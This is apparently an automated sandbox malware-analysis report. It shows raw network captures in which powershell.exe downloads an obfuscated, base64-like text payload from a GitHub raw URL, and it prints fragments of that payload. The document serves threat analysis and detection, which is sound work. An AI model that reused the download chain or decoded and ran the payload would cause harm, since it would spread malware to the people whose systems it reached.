                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: 4c b9 bb 39 ae 78 4d 6b 6c e3 79 4b f5 3e 78 ce be a3 5f 8f e8 c7 4f ab 3c 4f 47 9f 5e 9b ce f1 ba 9b 52 8a 9d 8b 4c 34 2b 3d 11 11 a1 73 ce b7 8b 9c 4e 8b 39 27 b8 b3 cf 5e 82 38 f4 e8 46 33 b9 2e 51 be 1a cc e1 db 37 3c 0f a3 3d 65 dc 63 2f 57 47 9f a4 d7 7b f3 b4 ce bd 15 c5 ae 75 d1 58 39 ba 9a 69 9e 3d 6a ce 77 d4 1c e6 ca 5c 86 ac 22 56 b3 71 ab 97 23 7c cd 2b 28 ce b7 d7 8b 4a da b9 83 ac f2 ba 19 e9 8c f1 d3 a6 f9 6e 36 ae 4d 25 d6 67 23 6b c3 70 d7 25 2e d9 69 85 68 65 8e b9 f4 1c 95 73 d0 b2 c4 eb 7c ea ce ad 78 b5 ce f7 59 99 de d0 05 bc 35 95 b8 8a d3 4e 26 9d 15 c3 47 55 f0 f4 4d 5e bc f6 b7 96 8d 98 2e 57 9d e9 69 cc fa 6e ce 3e 5f 56 ab c7 e8 ed 67 3b d2 63 30 9b 8a 9c d6 b3 a9 9e 2b d5 5c e8 eb ae 4d 73 bd e6 2b 3a 71 51 66 4b ab 4b 38 27
                                                                                                                                      Data Ascii: L9xMklyK>x_O<OG^RL4+=sN9'^8F3.Q7<=ec/WG{uX9i=jw\"Vq#|+(Jn6M%g#kp%.ihes|xY5N&GUM^.Win>_Vg;c0+\Ms+:qQfKK8'
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: 35 18 82 a7 29 3a 05 6a 56 6c 25 a1 5e 99 c1 58 ba 16 b2 15 2c 11 26 c9 29 20 bb ae 77 a3 97 09 e8 55 0c a2 5d d2 62 ae d6 27 51 22 6d 99 9a c9 1a 66 16 b3 d2 85 44 4a 0b 33 bd 2e 30 6e 56 9e 54 52 0a 4e 34 26 99 0d 66 97 67 cf 49 a0 e5 4a c5 a5 56 28 d9 41 55 59 44 6e b3 de cc ea a5 ab ce e2 2a f3 ce 3a 0c 68 d1 66 eb 5c e3 34 dd 67 9d 9d 51 cf a9 a4 52 5c 0d 2a e3 3d 36 8c ef 31 bb 07 24 b6 a4 49 b4 ea 69 5a bc ee 21 a0 ac f5 c6 e3 6c a8 9a 30 8f 9c e9 cb a3 e6 33 d7 d7 e3 cf 4e ea d4 c7 2e ae 89 79 7b 39 fa 61 8a e5 9d 14 9b 4d 91 9f 4e 2d 7a 2b 29 cd e8 d7 1a cd d1 63 62 d6 79 eb ba 66 a6 a6 3a 33 66 2e 3a 25 9e 7e be 71 0f a8 e4 9e 99 ac 8e 84 73 bd 43 49 4e 39 dd e3 a9 d1 39 89 dc fc cb ce fa 73 cb a2 e7 1d 29 a5 e7 a4 4d 46 aa 0e aa c5 63 ae 90 a8
                                                                                                                                      Data Ascii: 5):jVl%^X,&) wU]b'Q"mfDJ3.0nVTRN4&fgIJV(AUYDn*:hf\4gQR\*=61$IiZ!l03N.y{9aMN-z+)cbyf:3f.:%~qsCIN99s)MFc
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: d0 05 0d 34 30 60 26 00 86 00 34 0d 26 30 43 40 0d 31 34 c4 34 03 40 9b a9 62 81 b0 13 54 30 13 4e 00 04 d3 a0 02 5b 43 00 00 84 c0 00 06 02 00 06 09 80 98 00 9d 21 90 26 09 a2 9a 64 00 50 04 03 40 00 00 03 43 43 a4 34 0c 20 4c 13 00 04 30 43 49 8c 0a 4d 10 00 03 04 a8 10 c2 5b 41 36 19 d3 14 68 41 36 20 40 30 96 c5 43 11 0d 28 a9 22 a1 00 d1 34 0a a6 d4 0c 00 10 c0 44 d2 56 d0 00 86 e5 8c 96 31 21 b4 00 00 20 62 03 e4 be bb 3b 3e 13 b3 d2 f1 fb f1 ac 7a 3b ba 73 f0 b5 f6 b0 93 87 ab 1e 26 bd b7 f3 71 a9 f5 5b 7c b7 74 d7 b3 a7 93 d3 89 e8 3f 37 5c ef d0 be 35 8e 9e 82 e4 d9 ad ab 0b cd a5 69 58 e4 09 b1 46 d2 26 24 02 4a a8 83 6c 9b 08 d8 39 b8 3d 6c d3 e6 fc 3f be 3a 71 fc cb 9f f5 1e 1d be 03 4f b1 e0 eb cb c5 ec 8e 2d 67 db e9 f9 5c 6b ec b6 f9 1e d9
                                                                                                                                      Data Ascii: 40`&4&0C@144@bT0N[C!&dP@CC4 L0CIM[A6hA6 @0C("4DV1! b;>z;s&q[|t?7\5iXF&$Jl9=l?:qO-g\k
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: 4e 90 00 34 26 d0 09 8d 02 0c 04 c1 53 90 60 c0 4c 00 1a 00 02 00 28 00 1c 32 89 64 b6 a0 18 00 53 10 00 c0 4c 96 c8 01 0d c2 34 32 55 b3 c1 1b ac d4 6c f9 a8 d8 c5 9a bc 83 53 37 56 a5 16 90 51 2e 18 81 81 42 64 0d 14 30 00 43 13 00 01 a9 8a 00 00 a6 20 04 c6 84 30 06 93 01 22 84 c0 40 46 88 62 c8 dd 48 52 18 09 80 00 26 02 06 e4 18 81 88 29 26 67 6a 4d 32 b5 0e e4 a6 20 60 80 00 00 62 06 20 69 a0 45 09 30 13 04 d3 8e 4f 37 d9 f1 7a 73 dd f6 67 9e 99 56 84 a5 67 a0 03 55 3a c8 11 a2 49 6c ca 86 ad 20 62 a1 cc 52 68 84 39 60 00 27 15 2d 4d cd 95 34 4b 91 6e cc 35 ab 31 8e 84 67 46 86 2b 56 4c db 93 2a 87 5a 4c c8 aa 9c 4d 0a 9b 32 8d 08 76 97 99 2e ca 34 5a 53 28 46 88 b7 14 32 1d 90 6c 46 31 d0 8c ad 4d a8 aa 89 6c b2 5c 96 50 5c b2 22 57 59 b2 c8 49 a3
                                                                                                                                      Data Ascii: N4&S`L(2dSL42UlS7VQ.Bd0C 0"@FbHR&)&gjM2 `b iE0O7zsgVgU:Il bRh9`'-M4Kn51gF+VL*ZLM2v.4ZS(F2lF1Ml\P\"WYI
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: b5 0c cb a3 39 d6 00 b4 09 84 ab 50 8a 09 5a c5 43 60 8b 69 0a 94 0a 95 4c e8 d3 13 42 cc cd 5d 64 e9 4a 9a 23 e7 3e 2b ec be 27 d9 e4 ed ed f2 7d 0e 93 ba b3 ea c6 e7 7e 6d f2 4e c9 76 df 18 cd ea cf 19 36 51 d4 b8 9a 86 5a 67 ac 3b bc e6 ba 48 58 d6 eb 86 eb a6 b1 d3 37 a9 62 e6 f4 c4 d1 33 aa b3 25 a2 48 5b e3 66 5b aa ad 2a 0c ef 48 c6 8d 6f 1d 22 29 84 8d 8b 5c 2d 6a 35 44 35 24 ce ba d9 8d 5a 8c b1 da 8c 77 ac cb e7 8d 35 8d 9a 8c e8 48 b2 b7 e7 b6 aa a1 c5 29 65 45 35 71 a3 31 56 02 68 73 61 99 ac a6 46 d3 63 32 d2 52 5b 21 d4 dc ba 6d 62 2e 25 eb 13 d7 20 08 04 c6 84 52 10 d2 a0 41 a2 a4 d5 34 0d c9 0c 00 00 00 04 54 88 05 00 18 24 62 00 42 b6 21 a6 e4 40 2a 01 40 00 6a c4 c7 2a 02 c0 61 25 20 18 a8 64 21 82 19 48 1a 20 04 da 01 a5 01 cb 2d b2 46
                                                                                                                                      Data Ascii: 9PZC`iLB]dJ#>+'}~mNv6QZg;HX7b3%H[f[*Ho")\-j5D5$Zw5H)eE5q1VhsaFc2R[!mb.% RA4T$bB!@*@j*a% d!H -F
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: 00 00 90 18 a8 6a d4 c4 50 98 86 09 a6 02 11 a0 18 80 68 18 81 88 4a 39 51 d2 e7 85 7d 13 cc ea b3 a0 4e 56 82 50 22 ca 79 15 a9 15 0c 42 b4 31 34 03 48 a7 8d 32 d9 94 6e 93 54 c4 b4 82 c6 84 37 9c 26 ce 41 bc 2c d1 26 a3 40 d2 68 98 00 0a d0 40 00 98 28 0a 8a 96 00 e9 02 86 27 00 98 01 68 02 26 98 9a 63 42 1a 1c 26 4d 0d 52 00 00 0a 98 80 18 80 04 c5 1a 24 2a 5d 09 a4 cb 3e a4 9e 66 bd 26 9a 12 e4 68 cc d0 99 5b 19 35 31 a1 2c 16 4b 05 c8 8a 05 cb d6 eb e5 7e 67 f4 ff 00 0f a7 3f 8a eb 5e 67 a3 97 b9 d1 e0 75 59 f4 47 8f d1 8d fa af 97 7c 5d ef 97 7c dd cc de 75 5a f2 ed 66 8a 6e 5a bc eb 3b d1 e3 52 e8 22 5a 33 6b 4e 4b 2a f2 76 5a 2b 37 33 64 a9 ca 2b 2d 44 75 8a 4d d6 78 cb a1 1a 59 b6 74 94 b8 cd 3a 16 45 6a c2 f2 05 4b 2d 89 34 16 29 d0 33 aa 12 4a
                                                                                                                                      Data Ascii: jPhJ9Q}NVP"yB14H2nT7&A,&@h@('h&cB&MR$*]>f&h[51,K~g?^guYG|]|uZfnZ;R"Z3kNK*vZ+73d+-DuMxYt:EjK-4)3J
                                                                                                                                      2025-02-11 18:03:27 UTC16384INData Raw: 01 30 56 99 12 ac a4 31 10 c5 4c 52 b0 95 b4 9a 31 30 68 1a 69 01 34 9a 00 72 0d 30 04 14 20 4c 00 0a 1c b1 14 86 90 52 4e d6 80 00 44 c2 06 88 00 b4 00 04 d5 52 48 c0 40 08 4c 4a 31 89 37 62 01 46 28 29 02 6e 4a 24 2a 53 01 00 c5 63 4a 86 90 31 00 30 40 86 90 b6 93 94 a9 06 d3 13 18 21 23 11 4d 31 13 05 1c b5 1c b8 06 22 60 21 80 e4 18 9a a6 00 98 00 a0 54 5a 80 46 20 00 07 0d 1b 90 a4 20 1a 1a 0a 62 6a 08 18 86 58 10 08 5a 25 94 48 30 4b 52 d9 cd c9 e9 3b 39 de e8 e4 eb 01 a1 43 68 18 8a 1a 70 a3 44 71 5f 51 4d 32 58 e4 ee 2c e6 7b 73 d9 1d 1c dd 14 ad 69 8d 5b 95 2d 12 c1 c9 4c 54 2a 4a 57 23 48 34 76 4d c4 46 aa 29 65 6a ec c1 eb 36 27 30 6b 58 54 bb 19 d6 7a 28 d8 4f 35 cd 76 e2 a9 0b 49 30 04 00 23 25 8c 12 d1 28 b4 98 08 18 03 42 1b 44 31 14 c4 00
                                                                                                                                      Data Ascii: 0V1LR10hi4r0 LRNDRH@LJ17bF()nJ$*ScJ10@!#M1"`!TZF bjXZ%H0KR;9ChpDq_QM2X,{si[-LT*JW#H4vMF)ej6'0kXTz(O5vI0#%(BD1


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.749770185.199.110.1334437844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2025-02-11 18:03:39 UTC120OUTGET /richie213/karanew/refs/heads/main/ieIgFed.txt HTTP/1.1
                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      2025-02-11 18:03:39 UTC901INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      Content-Length: 521976
                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                      ETag: "173d9c7241ded9c777b1eccf3d2d54c2de0aa6e128d8435edfe4d22c74744d9d"
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: deny
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      X-GitHub-Request-Id: 6320:35EC15:24BA13:283C61:67AB8C16
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      Date: Tue, 11 Feb 2025 18:03:39 GMT
                                                                                                                                      Via: 1.1 varnish
                                                                                                                                      X-Served-By: cache-nyc-kteb1890024-NYC
                                                                                                                                      X-Cache: HIT
                                                                                                                                      X-Cache-Hits: 0
                                                                                                                                      X-Timer: S1739297020.771112,VS0,VE60
                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                      X-Fastly-Request-ID: 88bfa0506d7829328350c5af28243ebea6b24a01
                                                                                                                                      Expires: Tue, 11 Feb 2025 18:08:39 GMT
                                                                                                                                      Source-Age: 0
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                      Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 53 50 75 39 57 61 7a 4a 58 5a 57 52 33 63 6c 5a 57 61 75 46 57 62 67 49 53 4d 32 35 53 62 7a 46 6d 4f 74 39 32 59 74 51 6e 5a 76 4e 33 62 79 4e 57 61 74 31 79 63 68 31 57 5a 6f 4e 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 35 78 6d 59 74 56 32 63 7a 46 47 50 4b 30 67 43 4e 34 7a 50 69 4d 58 5a 35 4a 53 50 6c 35 32 62 73 46 47 5a 75 46 47 64 7a 42 69 49 34 30 69 52 55 56 6c 49 39 63 6d 62 70 52 32 62 6a 35 57 5a 67 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 48 49 73 31 47 65 2f 77 7a 76 37 65 72 54 67 44 4f 41 41 41 41 4d 41 34 43 41 77 41 67 4c 41 41 44 41 75 41 51 4d 41 41 41 41 75 42 77 62 41 6b 47 41 7a 42 67 63 41 55 47 41 57 42 41 49 41 6b 48 41 73 42 67 59 41 30 47 41 6c 42 77 63 41 4d 48 41 42 42 51 41 41 67 41 41 34 41 41 41 41
                                                                                                                                      Data Ascii: SPu9WazJXZWR3clZWauFWbgISM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN2c64mc1JSPz5GbthHI5xmYtV2czFGPK0gCN4zPiMXZ5JSPl52bsFGZuFGdzBiI40iRUVlI9cmbpR2bj5WZgICMuEjI942bpNnclZHIs1Ge/wzv7erTgDOAAAAMA4CAwAgLAADAuAQMAAAAuBwbAkGAzBgcAUGAWBAIAkHAsBgYA0GAlBwcAMHABBQAAgAA4AAAA
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 67 41 51 4a 2f 44 41 41 41 41 41 41 73 78 47 5a 75 55 57 5a 79 39 32 59 7a 31 47 41 75 6c 57 59 4e 56 47 65 46 4a 33 62 44 39 46 41 41 41 41 41 41 41 41 41 46 63 4c 59 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 55 77 74 75 42 41
                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgAQJ/DAAAAAAsxGZuUWZy92Yz1GAulWYNVGeFJ3bD9FAAAAAAAAAFcLYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAUwtuBA
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 64 35 56 52 70 56 41 6b 4c 35 64 47 45 45 45 4f 4c 58 76 65 72 54 67 44 4f 34 4f 56 71 64 54 31 30 71 59 37 35 5a 38 6d 51 69 74 61 57 37 72 65 50 79 30 6f 30 59 38 61 75 48 6e 41 79 2f 61 44 37 4f 54 45 46 32 72 49 4a 48 47 4d 54 58 5a 6d 4a 39 50 36 58 34 63 6d 4e 65 72 54 67 44 4c 35 6d 76 4a 63 52 54 77 76 32 4b 6d 66 47 34 6b 37 35 42 32 64 37 44 78 6c 59 76 4d 7a 68 6b 65 72 54 67 44 54 77 6f 77 6c 46 35 31 7a 41 69 59 41 67 37 69 46 69 65 72 54 67 44 64 56 79 77 43 42 49 41 39 75 65 50 42 5a 4c 6c 42 65 73 55 70 72 48 67 53 5a 69 65 66 47 4e 4c 31 38 69 39 72 64 5a 2f 48 78 57 57 52 70 75 56 74 77 34 35 48 4c 4f 6f 37 52 58 65 72 54 67 44 4a 5a 6e 72 78 42 57 46 38 44 46 35 68 56 4d 76 70 76 7a 76 4d 4b 6d 7a 66 47 63 78 47 5a 35 43 7a 62 31 36 34
                                                                                                                                      Data Ascii: d5VRpVAkL5dGEEEOLXverTgDO4OVqdT10qY75Z8mQitaW7rePy0o0Y8auHnAy/aD7OTEF2rIJHGMTXZmJ9P6X4cmNerTgDL5mvJcRTwv2KmfG4k75B2d7DxlYvMzhkerTgDTwowlF51zAiYAg7iFierTgDdVywCBIA9uePBZLlBesUprHgSZiefGNL18i9rdZ/HxWWRpuVtw45HLOo7RXerTgDJZnrxBWF8DF5hVMvpvzvMKmzfGcxGZ5Czb164
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 4f 65 72 54 67 44 61 36 53 4b 6e 69 32 6b 62 37 58 61 71 48 65 72 54 67 44 4a 72 44 34 68 46 63 36 48 35 43 68 7a 47 2f 50 6a 4a 6d 39 58 41 71 37 48 65 72 4d 59 75 57 50 4a 73 31 79 71 49 6c 36 7a 66 67 6d 52 45 50 7a 34 58 50 56 2f 66 5a 74 55 45 4b 64 57 32 50 58 50 36 30 56 2f 62 30 49 34 61 62 59 65 63 62 64 44 4e 4f 6f 46 31 33 4b 44 71 48 4c 52 78 41 78 70 56 2f 36 35 71 57 4f 5a 30 79 52 6d 69 62 47 76 53 61 69 68 47 39 61 56 64 35 6d 6d 47 4a 53 56 69 51 55 6c 6c 62 69 6d 6b 72 55 30 65 31 45 56 7a 6c 32 43 66 32 49 50 6d 53 43 4b 43 34 6f 65 72 54 67 44 4a 57 72 6d 64 76 53 4e 43 6a 49 39 57 7a 4c 6c 78 44 57 39 59 33 6f 66 62 31 39 41 49 63 36 4b 45 4a 7a 61 4f 52 6a 31 73 70 2f 61 63 4c 73 71 2f 37 4f 7a 6d 42 54 55 59 49 4d 50 30 6c 43 5a 47
                                                                                                                                      Data Ascii: OerTgDa6SKni2kb7XaqHerTgDJrD4hFc6H5ChzG/PjJm9XAq7HerMYuWPJs1yqIl6zfgmREPz4XPV/fZtUEKdW2PXP60V/b0I4abYecbdDNOoF13KDqHLRxAxpV/65qWOZ0yRmibGvSaihG9aVd5mmGJSViQUllbimkrU0e1EVzl2Cf2IPmSCKC4oerTgDJWrmdvSNCjI9WzLlxDW9Y3ofb19AIc6KEJzaORj1sp/acLsq/7OzmBTUYIMP0lCZG
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 47 46 76 38 77 6b 36 42 74 6d 47 46 31 7a 78 39 35 51 43 41 78 44 4b 78 75 39 54 35 53 6c 6e 31 37 54 68 6c 4b 54 56 53 5a 66 58 68 57 79 4d 74 71 71 4b 42 37 33 30 42 6c 75 50 78 6e 78 65 6e 39 47 58 73 4a 4d 51 72 77 4d 55 49 4c 4d 57 50 6d 30 59 4f 73 42 6c 4d 34 58 55 51 63 39 6e 34 35 55 38 57 59 2f 45 37 72 4a 58 77 5a 33 78 61 47 4a 32 45 4f 65 72 54 67 44 64 63 43 56 4b 58 65 35 4e 4d 42 56 54 4a 32 76 78 36 4e 55 71 6d 31 36 37 4b 32 6a 68 49 30 2f 34 59 79 75 69 65 72 54 67 44 6b 48 31 76 32 6e 33 51 49 34 37 77 7a 62 34 4f 66 68 6b 43 72 37 79 55 73 4f 39 63 74 44 61 4f 4a 51 7a 43 76 36 30 6a 4f 69 65 72 54 67 44 37 6a 34 49 38 6b 39 46 72 58 6f 37 69 42 48 47 56 44 49 76 5a 5a 57 35 5a 41 7a 43 61 47 45 62 34 4f 67 67 64 71 57 66 74 38 6c 75
                                                                                                                                      Data Ascii: GFv8wk6BtmGF1zx95QCAxDKxu9T5Sln17ThlKTVSZfXhWyMtqqKB730BluPxnxen9GXsJMQrwMUILMWPm0YOsBlM4XUQc9n45U8WY/E7rJXwZ3xaGJ2EOerTgDdcCVKXe5NMBVTJ2vx6NUqm167K2jhI0/4YyuierTgDkH1v2n3QI47wzb4OfhkCr7yUsO9ctDaOJQzCv60jOierTgD7j4I8k9FrXo7iBHGVDIvZZW5ZAzCaGEb4OggdqWft8lu
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 47 43 6d 6b 72 65 74 61 75 6e 67 4d 4d 6d 48 49 51 6a 4e 69 6c 37 65 72 54 67 44 39 74 6c 73 4f 36 7a 56 38 6a 72 6e 4f 43 74 64 32 75 55 57 75 78 34 57 34 64 4f 2f 32 4f 76 69 38 6d 72 37 34 35 33 64 37 56 67 46 33 6b 67 68 37 45 70 53 65 72 54 67 44 53 34 6f 61 6a 71 71 64 74 61 66 5a 75 48 69 62 57 6c 4a 52 6e 6b 57 65 72 54 67 44 67 36 61 31 47 43 4e 74 48 71 42 65 72 54 67 44 35 7a 6b 64 4a 71 54 75 30 36 2f 4a 32 32 45 33 59 38 44 56 63 78 77 35 67 36 75 36 6e 65 50 4c 47 47 53 6e 52 45 49 56 65 72 54 67 44 5a 69 46 75 65 72 54 67 44 30 4b 32 75 58 55 79 66 35 61 68 77 76 70 62 31 6c 41 6b 59 38 63 41 47 30 43 68 38 6f 4e 66 30 79 30 43 56 6a 55 68 67 45 66 51 4a 70 6f 30 69 63 35 76 6a 57 51 33 2f 33 65 72 54 67 44 57 38 46 63 62 51 4e 59 70 53 41
                                                                                                                                      Data Ascii: GCmkretaungMMmHIQjNil7erTgD9tlsO6zV8jrnOCtd2uUWux4W4dO/2Ovi8mr7453d7VgF3kgh7EpSerTgDS4oajqqdtafZuHibWlJRnkWerTgDg6a1GCNtHqBerTgD5zkdJqTu06/J22E3Y8DVcxw5g6u6nePLGGSnREIVerTgDZiFuerTgD0K2uXUyf5ahwvpb1lAkY8cAG0Ch8oNf0y0CVjUhgEfQJpo0ic5vjWQ3/3erTgDW8FcbQNYpSA
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 4d 64 76 33 54 53 64 72 65 72 54 67 44 36 65 72 54 67 44 4c 6f 75 74 2f 38 4f 66 59 46 48 42 63 59 69 52 5a 76 38 44 47 4b 68 46 39 54 44 52 64 38 6e 55 43 59 6b 5a 51 31 45 33 37 39 2f 7a 65 73 6c 4e 6a 41 51 61 30 55 42 67 79 6f 65 72 54 67 44 6f 6d 35 57 38 65 72 54 67 44 6e 6b 48 7a 53 54 62 65 72 54 67 44 31 55 53 44 49 65 41 78 71 49 74 58 77 58 36 38 75 4c 64 4d 36 74 6b 73 2f 61 64 72 4e 63 41 55 70 69 74 6b 43 43 53 6b 53 4b 56 58 30 63 58 78 33 6f 4c 50 36 55 42 71 35 57 51 35 52 63 55 43 56 52 68 49 4e 46 79 33 52 31 47 4e 67 6f 73 4f 62 31 30 43 62 78 79 66 48 32 34 50 58 4b 45 79 6a 43 68 78 4c 53 74 38 6f 7a 6b 6d 78 6b 32 42 30 39 47 44 7a 64 52 53 4b 30 58 65 72 54 67 44 39 48 45 6f 67 31 47 6a 54 32 71 44 52 59 51 4c 4b 46 52 35 30 37 38
                                                                                                                                      Data Ascii: Mdv3TSdrerTgD6erTgDLout/8OfYFHBcYiRZv8DGKhF9TDRd8nUCYkZQ1E379/zeslNjAQa0UBgyoerTgDom5W8erTgDnkHzSTberTgD1USDIeAxqItXwX68uLdM6tks/adrNcAUpitkCCSkSKVX0cXx3oLP6UBq5WQ5RcUCVRhINFy3R1GNgosOb10CbxyfH24PXKEyjChxLSt8ozkmxk2B09GDzdRSK0XerTgD9HEog1GjT2qDRYQLKFR5078
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 69 38 67 63 49 6b 67 74 70 35 2f 76 65 72 54 67 44 67 30 44 6f 7a 77 74 77 38 46 46 32 59 67 59 6f 75 68 58 6b 69 6a 58 2f 41 6d 48 76 75 39 50 56 4b 73 4d 6e 55 64 2f 73 44 4a 35 57 54 77 71 42 4f 5a 35 6e 4b 6e 59 43 64 57 43 53 53 69 4d 32 35 30 38 65 70 31 5a 4c 46 72 4b 6f 69 72 6f 47 7a 6c 61 69 52 5a 61 44 65 72 54 67 44 4e 45 38 31 53 6a 63 6f 66 38 67 68 6b 79 52 35 76 62 41 38 46 61 74 41 4b 55 78 31 6b 36 31 43 57 4b 78 38 4f 67 4b 57 41 42 6b 42 78 35 38 77 69 43 79 4e 35 4f 57 51 32 68 34 49 57 39 66 50 4c 4d 67 57 59 35 34 6a 64 36 52 46 42 37 61 65 72 54 67 44 47 6e 4d 75 6b 4c 74 68 48 39 4c 61 67 31 37 45 32 57 50 59 6c 65 65 65 72 54 67 44 36 2f 49 49 67 45 56 79 46 62 72 45 67 79 42 45 4d 62 55 4f 62 46 6f 4a 65 72 54 67 44 33 6b 31 56
                                                                                                                                      Data Ascii: i8gcIkgtp5/verTgDg0Dozwtw8FF2YgYouhXkijX/AmHvu9PVKsMnUd/sDJ5WTwqBOZ5nKnYCdWCSSiM2508ep1ZLFrKoiroGzlaiRZaDerTgDNE81Sjcof8ghkyR5vbA8FatAKUx1k61CWKx8OgKWABkBx58wiCyN5OWQ2h4IW9fPLMgWY54jd6RFB7aerTgDGnMukLthH9Lag17E2WPYleeerTgD6/IIgEVyFbrEgyBEMbUObFoJerTgD3k1V
                                                                                                                                      2025-02-11 18:03:39 UTC1378INData Raw: 55 50 59 61 33 72 6c 78 78 2f 61 72 65 65 49 68 36 4c 70 6e 53 68 69 4d 71 6a 64 58 52 67 44 68 50 44 45 50 6f 6e 71 47 6d 44 32 6e 4d 69 65 72 54 67 44 6a 49 66 6e 7a 2f 66 55 7a 33 56 59 54 6a 68 77 76 59 31 36 4f 6e 45 54 4a 73 6d 4c 4f 44 30 34 49 52 6c 30 77 34 36 54 48 38 51 63 56 77 39 30 4c 45 50 32 4c 6d 39 47 6d 53 63 45 70 6f 58 33 51 78 76 48 53 35 64 68 7a 72 4e 6b 77 75 39 76 72 78 44 58 67 4c 51 35 35 39 71 76 33 6a 76 6e 7a 57 57 62 43 79 71 35 68 65 35 70 4e 47 64 53 33 34 4c 47 63 38 57 44 66 67 72 35 46 42 74 67 67 73 4d 4a 74 48 48 4a 59 52 5a 49 6c 34 71 73 7a 63 79 6f 5a 48 34 39 4d 43 56 48 65 70 53 31 65 72 54 67 44 65 72 54 67 44 68 4f 4c 74 75 32 6e 5a 75 65 78 72 34 69 38 4f 34 6c 34 32 32 37 47 6d 5a 68 32 48 79 38 39 4c 56 51
                                                                                                                                      Data Ascii: UPYa3rlxx/areeIh6LpnShiMqjdXRgDhPDEPonqGmD2nMierTgDjIfnz/fUz3VYTjhwvY16OnETJsmLOD04IRl0w46TH8QcVw90LEP2Lm9GmScEpoX3QxvHS5dhzrNkwu9vrxDXgLQ559qv3jvnzWWbCyq5he5pNGdS34LGc8WDfgr5FBtggsMJtHHJYRZIl4qszcyoZH49MCVHepS1erTgDerTgDhOLtu2nZuexr4i8O4l4227GmZh2Hy89LVQ


                                                                                                                                      Statistics

                                                                                                                                      CPU Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      Memory Usage

                                                                                                                                      Click to jump to process

                                                                                                                                      High Level Behavior Distribution

                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                      Behavior

                                                                                                                                      Click to jump to process

                                                                                                                                      System Behavior

                                                                                                                                      General

